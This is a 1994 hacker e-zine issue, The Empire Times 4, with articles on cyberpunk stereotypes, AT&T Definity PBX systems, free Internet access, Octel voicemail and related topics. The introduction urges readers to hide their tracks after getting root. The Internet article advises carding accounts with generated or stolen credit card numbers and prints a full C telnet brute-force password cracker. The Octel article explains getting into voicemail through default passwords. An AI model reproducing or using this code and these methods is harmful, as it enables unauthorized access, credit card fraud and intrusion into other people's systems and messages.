Copy Link
Add to Bookmark
Report
The Empire Times Issue 4
From armitage@dhp.com Sun Sep 25 19:26:49 1994
Date: Sun, 25 Sep 1994 15:48:19 -0400
From: armitage@dhp.com
To: dtangent@fc.net
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% T H E E M P I R E T I M E S %
% ------------------------------- %
% The True Hacker Magazine %
% %
% September 13th, 1994 Issue 4 %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
This Issues Features:
# Selection Author Size
- --------------------------- --------- ----
X. Introduction albatross 3k
1. The Cyber-punk Image firefly 7k
2. AT&T Definity System 75/85 erudite 15k
3. How to get free Internet Pud C0ur13r 14k
4. The Octel VMB System da telcopimp 20k
5. My Life as a Narc... noelle 10k
6. Hacking Simplex Locks erudite 3k
7. SS7 / Caller ID Discussion grendal 6k
8. Don't Tell us Our Name erudite 3k
------------------------------------------------------------------------------
Founder: Albatross
Organizer: Armitage
Contributors: Da Telcopimp,
Erudite,
Firefly,
Grendal,
Noelle,
PuD Courier.
Special Thanks: AT&T,
Sevenup.
===========================================================================
-=- The Empire Times -=-
Introduction
Yes it is true. The Empire Times is back online and ready for
a little rok -n- roll. The plan is to bring back what appears to be
lost from the underground world. The Times will go into details on
topics of Cellular fone phreaking to the personal lives of those
hackers which we all know and love.
I believe this issue will spark the intrest of those who have
become cyber-potatoes and those who have yet to realize what a UNIX
system is all about.
It is time for the Hacker Klan to unite and share information
so that we can expand our realm of control over the growing InterNet
which we love so much. Just think how much money is spent to keep us
out of systems which (as we all know) never works. I have always believed
that if there is a way for a regular user to access a system, then
there is a way in.
Always use your brain as to the capablities of the agencies
which are our to stop us, such as the FBI, S.S., and the Military.
When obtaining 'root' at sites, always remember to hide your tracks
into the system. Check for log files, see what wrappers and possible
cron jobs which might be running to catch you. Those who prevail shall
always be known as 'Elite'. Those who fail just didn't learn the tricks
of the trade fast enough.
Just remeber that we are building a MAFIA on the InterNet, if
you want it to succeed, then YOU know what has to be done. So keep
your minds growing and those electrons flowing.
Last words
==========
To the Virginia Crue: If the South is to rise again, Ya'll are
the ones that'll do it.
To the Maryland Crue: We have more Net access than any state.
Make sure that ya'll keep it like that.
Smoke it like a NeckBone.
To the D.C. Crue: I've never see so many hacked outdials and
PBX's. Keep it that way. Don't 4 get your 9mm.
"I'm only trying to build an Empire."
-Alby
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 1 of 8
The Cyberpunk Image
by firefly
There's a new flick that they are showing at schools in the area this
year. It's one of those documentaries that is produced exclusively for
educators that targets a certain culture and proceeds to slander against it.
"Cyberpunk" is such a movie. I had the unfortunate luck to sit through it in
a general education program in college last semester. That was bad enough
...but then I had to show it to a class this summer and then spark discussion
about it when I disagreed with the entire theme of the movie!
The movie "Cyberpunk" was a documentary that showed the use of
computers and continued the media's hype of the so-called "cyberculture".
The film was well-done, and well-organized, but I disagree with what I
consider are the film's themes about the "computer generation"
(a.k.a.: cyber-punks). Not to mention the fact it was written entirely in
"computer-esque" with techno music, rapid-picture imagery, and other
"information age" fads. This paper will discuss the term "cyberpunk" itself,
offer observations about this culture, and conclude with the true nature of
the computer generation.
The term cyberpunk, coined by William Gibson in his Neuromancer book,
is a literary and now, thanks to the media, an overused term used to describe
every type of "console cowboy" from a computer programmer to a malicious
electronic explorer, to someone who sees a Gibson-esque future run by
computers, to someone who dresses in leather, and carries a digital pager.
The term "punk" usually refers to someone against the current cultural norms
of society. The so-called cyberpunks are considered the small segment of
society that is against the current norms of "regular people". Well, the
truth of the matter is that these "cyber-dudes" have grown up around
computers, digital games, and electronic tools in the classroom and workplace.
Is it their fault that computers have simplified many redundant tasks in
society? Is it these people's fault that computers now help fly aircraft,
make cars, improve international communication? NO!
This computer generation is simply the first generation to pioneer
such a radically new concept of existence. While our forefathers saw things
in a linear perspective, we see them in a virtual reality that can be changed
into a nonlinear environment depending on our virtual vantage point. Timothy
Leary would say this is "consciousness-expansion". Consider your parents and
the advent of television or the superhighway across your home state. Your
parents saw it as revolutionary, and possibly frightening that automobiles
could "drive" in 6-8 lanes of 55mph traffic across the nation. They probably
saw the political and Orwellian problems with having a video receiver in their
living rooms that could broadcast political messages. But they adapted and
grew up with it, while their parents looked on in amazement. The same holds
true with the electronic age. My generation grew up with Atari, Apple,
Windows, and modems. We are used to "driving" with multiple pathways
simultaneously -- parallel processing -- our lives, and utilizing the vast
speed that information or data takes these days to further advance ourselves.
This illustrates how those in power of any sort -- political, literary,
media, business -- see this generation, as a band of people who use strange
things to live their lives. Well, the television was strange to my
grandmother, but she adapted -- as my mother grew up with it --, and so will
this generation of leaders adapt as our generation of people grow up with
computers. The difference with this computer generation is that we deal with
so much information at such a rapid pace, that those who look on us (ie,
policymakers and journalists) cannot keep up with it...hence the fear of what
they don't know. "Cyberpunk" sounds evil. The unknown is evil. Therefore,
since nobody understands the cyber-culture, those that do are therefore evil.
Simple societal algebra. The movie is full of stereotypes. Firstly, there is
no cyberpunk standard for music. People think techno is the music of the
computer age because it is fast and computer-generated. False. Granted, many
people who like techno like computers, but a history book of 2020 should not
show the 1990s' cyber-culture liking techno in the same way as 18th century
victorians enjoyed the waltz. Outstanding on-line magazine UXU-148
Technophilia mentions that the cyber-culture likes any form of music, and
not only computer-generated tunes. I associate with hackers, and people the
media calls "cyberpunks". Our music ranges from hard rock and metal to movie
soundtracks to top forty to reggae, and some techno. Yet, throughout the
movie, viewers are led to believe that fast techno is the "music of the
cyberpeople." Granted, a "rave" is an all-night computer-controlled techno
event is the climactic part of being a part of a cyberculture, but not
symbolic of the entire culture of computer-users.
There was "lotsa leather". Again, another stereotype. True, the
classic street punk wore combat boots and a leather jacket, but to imply that
this is how an entire subculture dresses is absurd! To dispel this myth, and
meet the movie on its own level of stereotyping, go to any rave, which many
consider the climactic event in the cyberculture. The fashion ranges from the
sublime to the ridiculous, from exotic to erotic, from jeans and T-shirts to
leather and handcuffs. Mostly people dress the way they go to a dance club.
The people they interviewed in the movie were interviewed at a convention,
or another public place, where they are dressing to make an impression. Just
because someone wears leather at a convention or on a documentary tape does
not mean he/she represents the entire culture being profiled, or that the
person dresses like that regularly. I know of very few hard-core cyber-kids
who dress that way. I frequently wear shorts, jeans, t-shirts and turtlenecks.
Part of my accessories is a pager and ATM card. Gee. According to Cyberpunk,
I cannot be a member of the cyberculture, since I don't own a leather jacket
or have long hair.
Enough ranting. I've got better things to do. But I just thought it
interesting that this flick is shown as an (and meant to be an) " objective
educational tool" to college students to show them about computers and
society, but portrays them as evil, conniving thugs.
Votes on next topic: Business Intelligence? or Social Engineering?
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 2 of 8
AT&T Definity System 75/85
by erudite
================================
AT&T Definity System 75/85
Communications System
Description & Configuration
================================
=====
Intro
=====
Let me introduce you to the AT&T Definity System 75/85. This communications
system is a product of the merging of the AT&T System 75 and System 85
architectures. The name Definity came from the two words "definitive" and
"infinity".
Let me also tell you that there are many different communications systems
out there. (Merlins, AT&Ts) Many many many, I couldnt name them all, but
the AT&T systems are nice. I enjoy working with them, and I hope you enjoy
this text file.
This System is an advanced business communications system. A Digital
Communications Protocol (DCP) allows data communication through data
terminal equipment connected to the digital switch. This allows the
system to handle data and voice communications simultaneously.
The System can handle up to 1600 lines that supports all digital, hybrid,
and analog terminals and equipment. Up to 400 trunks, and up to 400
Automatic Call Distribution (ACD) Agents. The Data switching capacity is up
to 800 digital data endpointsþ, and 160 integrated and combined pooled modem
facilities.
þ Digital Data Endpoints include the following:
þ 510D Personal Terminal or 515-Type Business Communications Terminal
þ 7404D Terminals
þ 7406D or 7407D Equipped with optional Data Module Base
þ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
þ Digital Terminal Data Modules
þ 3270 Data Modules
þ Internal Data Channels
þ Trunk Data Modules (Modular)
þ Processor Data Modules (Modular)
==========
Networking
==========
The Processor Port Network (PPN) always provides the switch processing
element (SPE) and port circuits. An Expansion Port Network (EPN) is
available to increase line size of any system by allowing you to add
additionnal port circuits. The EPN connects to the PPN over a fiber
optic cable that may be up to 1.86 miles remotely situated. It may also
by located adjacent to the PPN.
This System may be arranged stand-alone or you can integrate it into a
private network. You can form these types of Networks:
þ Tandem Tie Trunk Network (TTTN)
þ Electronic Tandem Network (ETN)
þ Main/Satellite Configuration
þ Distributed Communications System (DCS)
þ Centralized Attendant Service (CAS)
An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
makes it possible for the Definity System to access various private and
public network services. With ISDN-PRI the you can access these services:
þ Call by Call Service Selection
þ Private Network Services
þ Information Forwarding
þ Call Identification Display
- Connected Number Display
- Connected Party Name Display
- Calling and Called Number Record Display
- Calling and Called Party Name Display
=============
Configuration
=============
The Actual System is encased in a pair of "cabinets" which have a fiber
optic link between them. It is also common to have a stack of about three
"cabinets" of a smaller size, for different models.
Shown here is a typical multi-carrier system with a Processor Port Network
(PPN) cabinet and Expansion Port Network (EPN) cabinet.
attendant outside trunks _____ outside private line
consoles and lines / data transmission equipment or
\ \ / analog switched network
\ fiber optic | |
| connetion | | __ business communication
-+---------/~\--------+--+ / terminals
| AT&T | | AT&T | |
| DEFINITY | | DEFINITY +------' ___data
---+ SYSTEM | | SYSTEM +--------<>------[audix] / terminals
/ | 75/85 | | 75/85 | modular data /
| |___________| |__________+| processor ____ |
manager | | | | +'optional host
terminal | | +-------<>----------+ | computer or call
/ +-------[]-----+, |____| management system
/ asynchronous |
single line data unit \__ data
voice terminals terminals
===================
Voice and Data
Management Features
===================
There are alot of voice features and services, in fact, too many to list, I
will do a run down on all the interesting and useful features and services.
It has many Voice Management, Data Management, Network Services, System
Management, Hospitality Services, and Call Management Services.
þ Attendant Display: Contains useful call related information that the
call attendant can use to operate the console more efficiently
þ Audio Information Exchange Interface (AUDIX): This interface allows
both inside system users and remote callers to edit, recieve, send,
write, and forward voice messages.
þ Authorization Codes: A means to control user privileges throughout the
system.
þ Automatic Incoming Call Display: Shows identity of remote caller and relays
it to the display console.
þ Class of Restriction: Defines up to 64 classes of user restriction.
þ Conference Service
- Attendant Conference: Allows Attendant to construct a conference call
- Terminal Confernce: Allows remote user to construct a conference call
without attendant assistance.
þ Data Privacy: This, when activated by user, protects analog data calls from
being interrupted by any of the systems overriding features, and denies
ability to gain access to, and or superimpose tones.
þ Data Restriction: This feature is the same as Data Privacy, except that it
is issued by the administrator to a certain extension # for indication of
a dedicated private data extension.
þ DCS Call Forwarding All Calls: This is the voice forwarding service.
þ DCS Distinctive Ringing: This is simply a distinctive ringing feature.
þ Dial Access: This is simply the package of features that allows anyone in
the system to dial anyone else, such as the attendant console.
þ DS1 Tie Trunk Service: This service provides a digital interface for
the following trunks and more.
þ Voice Grade DS1 Tie Trunks
þ Alternative Voice/Data (AVD) DS1 Tie Trunks
þ Digital Multiplexed Interface (DMI) Tie Trunks
þ Central Office (CO) Trunks
þ ISDN-PRI Trunks
þ Remote Access Trunks
þ Wide Area Telecommunications Service (WATS) Trunks
þ Facility Test Calls: Provides voice terminal user who is capable of all
features and functions that is used for maintenance testing. Such as access
to system tones, access to specific trunks, etc.
Note: AT&T designed the Facility Test Calls Feature for testing
purposes only, and system maintenance. When properly
administered, AT&T claims that the customer is responsible for
all security items, and secure system from unauthorized users,
and that all users should be aware of handling access codes.
AT&T claims they will take no responsibility for poor
administration.
þ Hunting: The internal hunting feature is very nice, as you probably know,
it rings down if busy, or if it recieves a dial timeout.
þ Information System Network Interface (ISN): AT&T ISN is a
packet switched local area network that will link with mainframes,
workstations, personal computers, printers, terminals, storage devices,
and communication devices.
þ Integrated Services Digital Network Primary Rate Interface (ISDN-PRI):
This interface allows connection of the system to an ISDN Network by means
of ISDN frame format called PRI.
þ Inter-PBX Attendant Calls: Positions for more than one branch, and each
branch has a Listed Directory Number (LDN).
þ Modem Pooling: Switches connections of digital data endpoints.
þ Network Access (Private): Connect to the following Networks
þ Common Control Switching Arrangement (CCSA)
þ Electronic Tandem Network (ETN)
þ Enhanced Private Switched Communications Service (EPSCS)
þ Tandem Tie Trunk Network (TTTN)
þ Software Defined Network (SDN)
þ Network Access (Public): Access to public networks.
þ Privacy: Protects from others bridging into their extensions.
þ Remote Access: This lets you access the system remotely, again, AT&T
doesnt want to take responsibility for anything that is abused with this
feature.
þ Restrictions: There is a large list of restriction features that I'm sure
would come in handy.
þ Service Observing: Allows high access users to monitor
others calls, again, AT&T does not want to take any legal fees on missuse
on this feature.
þ Transfers: Allows any user to do an attendant call transfer without an
attendant's assistance.
========
Software
========
The System comes with swithced services software, administrative software,
and maintenance software. All running on a real-time operating system.
þ Switched Services Software: This Software provides all the calling features
and services. This also is responsible for relaying any information to the
console display.
þ Administrative Software: This Software is needed to run administrative
tasks, and configurations.
þ Maintenance Software: The Maintenance Software is used to
keep everything running properly.
=====================
System Administration
=====================
The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
number. The pound (#) and star (*) keys can be used as the first digit of the
code. Below you will see a typical Screen Format taken from one of my logs,
information aside you can see what the administration Screens look and feel
like.
--------------------------------------------------------------------
Page 1 of 4
STATION
Extension: ____
Type: _____ Lock Messages: _ COR: _ Room: _____
Port: ___________ Security Code: ____ COS: _ Jack: _____
Name: ___________ Coverage Path: ___ Cable: _____
FEATURE OPTIONS
LWC Reception? _____ Headset? _ Coverage Msg Retrieval? _
LWC Activation? _ Auto Answer? _ Data Restriction? _
Redirect Notification? _ Idle Appearance Preferences? _
PCOL/TEG Call Alerting? _
Data Module? _ Restrict Last Appearance? _
Display? _
ABREVIATED DIALINGS
List1: _____ List2: _____ List3: _____
BUTTON ASSIGNMENTS
1: _______ 6: _______
2: _______ 7: _______
3: _______ 8: _______
4: _______ 9: _______
5: _______
-------------------------------------------------------------------
==================
System Maintenance
==================
Finally the Maintenance section, where you can see where the errors are
logged, where all the alarms are sent, printed, etc.
There are 3 different types of alarms:
þ Major Alarms (Critical Damage, requires immediate attention)
þ Minor Alarms (Errors, still operable, requires action)
þ Warning Alarms (no noticeable degradation of service, not reported to
console or INADS)
The Error log is reported and can be viewed at The Manager Terminal,
as well as the alarm log.
==============
Basic Acronyms
==============
ADU Asynchronous Data Unit
AUDIX Audio Information Exchange
COR Class of Restriction
COS Class of Service
DCP Digital Communications Protocal
DMI Digital Multiplexed Interface
EPN Expansion Port Network
ISDN Integrated Service Digital Network
PPN Processor Post Network
PSDN Packet Switching Data Network
=====
Tones
=====
Here is most of the Tones, mostly either interesting ones or oftenly used
tones the System. Here are the tones, the frequencies, and the moderations.
Tone Frequency Pattern
---- --------- -------
Answer Back 3 2225 Hz 3000 on
Answer Back 5 2225 Hz 5000 on
Bridging Warning 440 Hz 1750 on, 12000 off,
650 on; repeated
Busy 480 Hz + 620 Hz 500 on, 500 off; repeated
Call Waiting
Internal 440 Hz 200 on
External 440 Hz 200 on, 200 off
Attendant 440 Hz 200 on, 200 off
Priority Call 440 Hz 200 on, 200 off, 200 on,
200 off, 200 on
Call Waiting
Ring Back 440 Hz + 480 Hz; 900 on (440 + 480)
440 Hz 200 on (440) 2900 off; repeated
Cnrt Att Call
Incoming Call
Indentification 480 Hz & 440 Hz 100 on (480), 100 on (440),
& 480 Hz 100 on silence;
Dial Zero,
Attendant Transfer,
Test Calls, 440 Hz 100 on, 100 off, 100 on
Coverage 440 Hz 600 on
Confirmation 350 Hz + 400 Hz 100 on, 100 off, 100 on,
100 off, 100 on
Dial 250 Hz + 400 Hz Continuous
Executive Override 440 Hz 300 on followed by
Intercept 440 Hz & 620 Hz 250 on (440),
250 on (620); repeated
Ringback 440 Hz + 480 Hz 1000 on, 3000 off; repeated
Zip 480 500 on
=====
Outro
=====
þ This file was based on the statistics for the AT&T Definity
System 75/85 (multi-carrier cabinet model) communications system.
I hope you learned something, anywayz, questions comments, system login
information, defaults, where to get manuals, or anything else.
email me (armitage@dhp.com) and I will get back to you.
erudite (armitage on irc)
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 3 of 8
How to Get a Free Internet Account
by PuD C0ur13r
I know the story. Your just starting out, and you don't have an
internet account. And you don't want to pay for one, right? Well, here are
some tips to getting free internet.
Freenets
----------------
Oh bleh, you say. A freenet?!?!@#$ Well, yes, a freenet. Why not?
You get a mailing address, a gopher, maybe usenet, maybe irc, maybe some
other added features. Heck, on some freenets you get a shell account. But
even if you don't get a shell account, there are many ways to get something
of a shell. Vi, Veronica, gopher, and many other useful little bugs. This
article is not for telling how to get shell on a freenet, because that would
take up another article. But here are some freenets:
telnet to:
leo.nmc.edu login: visitor
yfn.ysu.edu login: visitor
freenet.scri.fsu.edu login: visitor
freenet.carleton.edu login: guest
freenet.victoria.bc.ca login: guest
freenet.lorain.oberlin.edu login: guest
freenet.hsc.colorado.edu login: guest
bigcat.missouri.edu login: guest
garbo.uwasa.fi login: guest
ids.net login: guest
bbs.augsburg.edu login: guest
tpe.ncm.com login: guest
michael.ai.mit.edu login: guest
bbs.isca.uiowa.edu login: guest/new
phred.pc.cc.cmu.edu 8888 login: guest/new
muselab.ac.runet.edu login: bbs (send mail to 'gabe' to access irc)
netaxs.com login: bbs
shadow.acc.iit.edu login: bbs
bbs.augsburg.edu login: bbs
utbbs.civ.utwente.nl login: bbs
oscar.bbb.no login: bbs
bugs.mty.itesm.mx login: bbs
tudrwa.tudelft.nl login: bbs
ara.kaist.ac.kr login: bbs
cc.nsysu.edu.tw login: bbs
cissun11.cis.nctu.edu.tw login: bbs
badboy.aue.com login: bbs
tiny.computing.csbsju.edu login: bbs
Quartz.rutgers.edu login: bbs
bbs.fdu.edu login: bbs
paladine.hacks.arizona.edu login: bbs
freedom.nmsu.edu login: bbs
kids.kotel.co.kr login: bbs
wariat.org login: bbs
seabass.st.usm.edu login: bbs pass: bbs
heartland.bradley.edu login: bbguest
freenet-in-a.cwru.edu login: <none>
oubbs.telecom.uoknor.edu login: <none>
chop.isca.uiowa.edu login: <none>
pc2.pc.maricopa.edu 4228 login: <none>
af.itd.com 9999 login: <none>
hpx6.aid.no login: skynet
launchpad.unc.edu login: launch
atl.calstate.edu login: apa
forest.unomaha.edu login: ef
cue.bc.ca login: cosy
softwords.bc.ca login: cosy
vtcosy.cns.vt.edu login: cosyreg
Nebbs.nersc.gov login: new
Milo.ndsu.nodak.edu login: new pass: new
tolsun.oulu.fi login: box
mono.city.ac.uk login: mono pass: mono
newton.dep.anl.gov login: cocotext
kometh.ethz.ch answer at prompts: # call c600
TERMSERV call avalon
login: bbs
Va Pen or School Internet
----------------------------
I know that in Virginia, there is a semi-internet provider called
Va Pen. I call it semi, because only teachers usually get a shell account.
And the account will only last for a year, so then you have to subscribe for
the account again.
Also, your school might have some kind of internet feed. Try hooking
up with that in any way possible.
Card an Account
-------------------
There isn't much to be said on this. For Delphi, all you usually
need is a Credit Card Number Generator of some sort. The account will
probably only last about a day, but you can do it as many times as you want.
If you have a real CC number, with real name and address, then you will have
a semi-legit account, but that will probably only last untill that person
your carding gets his or her bill. :-) Experiment. Call up your local
provider, and try carding it. Chances are, it will work.
Decservers
-----------------
Some decservers are hooked up to the internet. The only way you
can find them is to scan for them. When you do find a decserver or two, do
'show services' command. If you see anything that is remotely related to
'telnet' or 'rlogin' then play around with it. You might be able to telnet
to a site on the internet.
1800 Internet
-----------------
There are two kinds of 1800 Internet. One is a 1800 number that
is kind of like a decserver, except its not. It lets you telnet like a
decserver though, but it only lets you use IP numbers. I have only played
around with a very few of these "decservers", because 1800 have ANI. And
this kind of telnet gets used to hell, so it doesn't last very long. One
person I knew got called by the authorities for using a 1800 "decserver".
But its not really illegal to use, because you didn't have to hack it, or
login into it. Its just there. But I wouldn't take that legal advice to
heart, though.
Another kind of 1800 Internet is where you can call up a unix and
get an account through the 1800 number. Delphi has this, as does IIA.org.
Cyberspace.net's number used to be 1800-833-6378, but I hear that it is
down.
A Plain Hacking Good Time.
------------------------------
Brute it away baby. You could also take that delphi account you just
carded, finger a site, and brute it that away. Bruting works about 2% of the
time now, but this script will brute for you.
/*
######################################
# Unix telneting brute force hacker #
######################################
*/
#include <stdio.h>
#include <sys/wait.h>
#include <signal.h>
/*
########################################
# Set this according to the path and #
# filename where telnet is located #
########################################
*/
#define TELNETPATH "/usr/ucb/telnet"
/*
##############################################################
# The Following are set to default on a SunOs login format. #
# You may need to change these for other systems. #
##############################################################
*/
#define LOGINSTRING "login:"
#define PASSSTRING "Password:"
#define GOTONESTRING "Last login"
/*
######################################################
# You won't need to edit anything after this point #
######################################################
*/
#define GETC(c) read(readfd,&(c),1) /* Functions to read and write pipe */
#define PUTC(c) write(writefd,&(c),1)
#define PUTS(s) write(writefd,(s),strlen(s))
char *HOST[80]; /* String: Holds connect to host on telnet */
char DBUG = 0; /* Switch: for Debug/Background modes */
char EOO = 0; /* Switch: Exit after 1st find */
char *afilename[80]; /* String: filename to account list */
char *pfilename[80]; /* String: Holds filename to password list */
char *ofilename[80]; /* String: Holds filename to output file */
char account[10]; /* Strings: Hold account/pw for attempts */
char password[10];
FILE *accounts; /* File pointers */
FILE *passwords;
FILE *found;
char ch; /* General purpose */
char buf[800];
int count;
int p1[2], p2[2]; /* Streams for the process pipe connection */
int writefd, readfd; /* Handles for the pipe */
/*
###############################################################################
# Handles the death of the telnet process due to a timeout on connection. #
# Restarts a telnet process and reconnects to the host #
###############################################################################
*/
void *death()
{
if (1 == 1) {
wait3(NULL, WNOHANG, NULL);
signal(SIGCLD, death);
switch (fork()) {
case 0:
dup2(p2[0], 0);
dup2(p1[1], 1);
execl(TELNETPATH, "telnet", 0);
printf("Exec Failed\n");
default:
PUTS(HOST);
return;
}
}
wait3(NULL, WNOHANG, NULL);
signal(SIGCLD, death);
return;
}
/*
###########################
# Error exit routine/Help #
###########################
*/
void help(parg)
{
printf("\nUsage: %s <address> -a<account list> -p<password list> -o<output>\n", parg);
printf("Flags: -d (Debug/Run in foreground)\n");
printf(" -1 Exit after first find\n\n");
exit();
}
/*
########
# MAIN #
########
*/
main(argc, argv)
int argc;
char **argv;
{
if (argc == 1)
help(argv[0]);
strcpy(HOST, argv[1]);
for (count = 2; count != argc; count++) {
if (argv[count][0] != '-') {
printf("\n:: Invalid Command Line ::\n");
help(argv[0]);
}
ch = argv[count][1];
switch (ch) {
case 'a':
if (!afilename[0])
strcpy(afilename, argv[count] + 2);
break;
case 'p':
if (!pfilename[0])
strcpy(pfilename, argv[count] + 2);
break;
case 'o':
if (!ofilename[0])
strcpy(ofilename, argv[count] + 2);
break;
case 'd':
DBUG = 1;
break;
case '1':
EOO = 1;
break;
default:
printf("\n:: -%c: Unknown option ::\n\n", ch);
help(argv[0]);
}
}
while (!afilename[0]) {
printf("AccountList: ");
gets(afilename);
}
while (!pfilename[0]) {
printf("PasswrdList: ");
gets(pfilename);
}
while (!ofilename[0]) {
printf("Outfile: ");
gets(ofilename);
}
printf("\nHOST: %s", HOST);
printf("\nAccountFile: %s", afilename);
printf("\nPasswrdFile: %s", pfilename);
printf("\nOutfile: %s", ofilename);
printf("\nDebug: ");
if (DBUG == 0)
printf("Off");
else
printf("On");
printf("\n");
strcpy(buf, HOST);
strcpy(HOST, "open ");
strcat(HOST, buf);
strcat(HOST, "\n");
printf(HOST);
if (DBUG == 0) {
if (fork()) {
printf("\nRunning in the background. ");
exit();
}
printf("PID: %d\n", getpid());
}
signal(SIGCLD, death); /* Execute death function when child dies */
/*
#######################################
# Set up pipes and start telnet child #
#######################################
*/
if (pipe(p2) == -1 || pipe(p1) == -1) {
printf("Error making pipes.=n");
return;
}
readfd = p1[0]; /* read from p1 */
writefd = p2[1]; /* write to p2 */
switch (fork()) {
case -1 :
printf("Couldnt fork off a child\n");
return;
case 0 : /* the child */
dup2(p2[0], 0); /* read from p2 */
dup2(p1[1], 1); /* write to p1 */
execl(TELNETPATH, "telnet", 0);
printf("Exec failed.\n");
exit(-1);
default: /* parent */
break;
}
/*
##############
# Open files #
##############
*/
if ((accounts = fopen(afilename, "r")) == NULL) {
printf("ERROR: AccountFile <%s> Not found.\n", afilename);
exit();
}
if ((passwords = fopen(pfilename, "r")) == NULL) {
printf("ERROR: PasswrdFile <%s> Not Found.\n", pfilename);
exit();
}
found = fopen(ofilename, "w+");
fprintf(found, "Trying Host: %s\n\n", buf);
fflush(found);
PUTS(HOST); /* Send open <host> to telnet */
while (1) { /* Loop to capture to buf */
if (GETC(ch) > 0) {
if (DBUG == 1)
putchar(ch);
buf[count++] = ch;
}
if (ch == 10)
count = 0;
if (strstr(buf, GOTONESTRING) != NULL) { /* Check for good account */
count = 0;
fprintf(found, "Account: %sPassword: %s\n", account, password);
fflush(found);
printf("Got one! Account: %sPassword:%s\n", account, password);
if (EOO == 1)
exit();
}
if (strstr(buf, LOGINSTRING) != NULL) { /* Check for login prompt */
count = 0;
strcpy(buf, "XXXXXXXX");
if (ftell(passwords) == 0) {
if (fscanf(accounts, "%s", account) == EOF) {
printf("End of accounts\n");
break;
}
strcat(account, "\n");
}
if (DBUG == 1)
puts(account);
PUTS(account);
}
if (strstr(buf, PASSSTRING) != NULL) { /* Check for passwd prompt */
count = 0;
strcpy(buf, "XXXXXX");
if (fscanf(passwords, "%s", password) == EOF) {
strcpy(password, account);
rewind(passwords);
}
else
strcat(password, "\n");
if (DBUG == 1)
puts(password);
PUTS(password);
}
}
}
Sites That give you shell accounts for free.
-----------------------------------------------
These are the only ones I know of offhand that you can telnet to and get free
accounts.
axposf.pa.dec.com login: axpguest pass: <enter>
cyberspace.org
cyberspace.net
cyberspace.com
cybernet.cse.fau.edu (not shell, but has alot of other nice things.)
cris.com
delphi.com (well, you know, that 5 hours of free internet deal.)
nyx.cs.du.edu login: new
hermes.merit.edu login: um-m-net
m-net.ann-arbor.mi.us login: newuser
If anyone wants to update, or make this t-phile more informational than it
already is, email roach@tmok.res.wpi.edu.
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 4 of 8
The Octel VMB System
by Da TelcoPimp
++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++
|| ||
|| /--------/ /--------/ /-------------/ /----------/ /-/ ||
|| / /----/ / / /---/ / /-----+ +-----/ / /----/___/ / / ||
|| / / / / / / /__/ / / / +---/ / / ||
|| / / / / / / / / / +---/ / / ||
|| / /____/ / / /___/---/ / / / /____/---/ / /____/---/ ||
|| /________/ /_________/ /_/ /__________/ /__________/ ||
|| ||
|| k|LLa ak-aSKi by Shadowdancer da TelC()PiMP ||
++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++
Octel is a type of VMB system, like Meridian Mail or Audix or whatever. But
Octel is not well known and I have recently been abusing these systems in my
area. There is one thing that I have noticed about these systems, they have
very good security. All this inpho was gotten from Octel Voice Information
Processing manual Release 3.0, a woman who works for Northern Telecom and
playing around on systems. So let this voyage into the world of the Octel VMB
system begin. Ignore all spelling errors, I cant spel worth shit. Format
for this file is: each section that begins with the # symbol means that
that is one of the options from the Main menu, and everything under that
will take you down levels..
Dialups:
========
There are two dialups for this system. There is the backdoor, the Octel
System number, and then there is the front door. The Backdoor can be used to
leave messages and also login to the vmb. This also goes for the front door
as well. The differnece between the front door and the backdoor is the
greeting. The front door is where you get the personalized greeting. The
backdoor will pick up and say something to the effect of enter the mailbox
number you wish to leave a message to or press # to indicate that you have
a mailbox on this system.
Hacking:
========
There is really not much to this part. I have encountered an octel system
backdoor where the box number was the same as the password. I have also
encountered a system where the password was the whole telephone number plus a
1 before it such as the box number was 1234 and the password was 1(pre)1234.
These are all just basic defaults but they are what I have encountered more
frequently.
What to do after Logging in:
============================
After you have logged in, before you are brought up to the main menu, you
may be given some messages about different things maybe a broadcast message
from your sysadmin or notification of automatically deleted messages etc.
Here is a list of options you can use at the main menu:
#1. Message Review
------------------
11: To hear new messages.
This option plays all new messages since the last session.
1: To review all messages.
This allows you to play all messages in your mailbox, in the order
recieved.
4: Replay.
After listening to a message you are able to hit 4 and replay that
last message. Commands used during playback will be listed at the
end of this section.
5: Get Envelope information.
Envelope iformation basically gives you the specs on a message. It
will tell you whether it came from someone who has a mailbox on that
system or whether it came from and outside caller. It will tell you
the date & time sent, how long it is and if the message is marked as
private, urgent or both.
6: Send a copy.
Press 6 and then you will be prompted to make a recording of comments
for the message so that the person the message is being forwarded to
knows that it is a forwarded message from you. After recording the
comments press #. If you would like to review your comments press 1.
Now you enter the mailbox or if you don't know that press # to dial
by name.
7: Erase.
Just what it says. It erases the message after you listen to the
message.
8: Reply.
After you press 8 record your reply and then press # to tell the
system you are done recording and then press # again to send. You
can use record/edit controls during your reply. These will be
covered later in the text.
9: Save.
Just as it says. This option archives your messages.
#: Skip a message.
While you are listening to the new messages you can press # to skip
them but after you listen to the new messages it plays your skipped
messages over and then your archived messages.
##: Skip to archived messages.
If you are listening to the new messages and you want to skip to the
archived messages just hit ## and you will be taken to them.
*: Cancel review of messages.
This option cancels message review and takes you back to the main
menu.
Commands used during playback of messages
-----------------------------------------
1: Rewinds message 10 seconds.
11: Rewinds to the begining of the message.
2: Pause. To unpause press 2 again.
3: Fast-forwards message 10 seconds.
33: Fast-forwards to the end of the message.
4: Plays the message slower.
5: Gives envelope information.
6: Plays the message faster.
8: Levels volume to normal level.
9: Increases volume.
#2. Sending messages to other subscribers on the system
-------------------------------------------------------
This function of the vmb is quite useful to the actual users of the system.
Once someone has recieved there messages and read them etc. They can then
send a message to someother person on that same system without having to dial
their front door. Here are the options that are used during the recording
and after the recording of the message.
#: Stop recording once you are satisfied with the message.
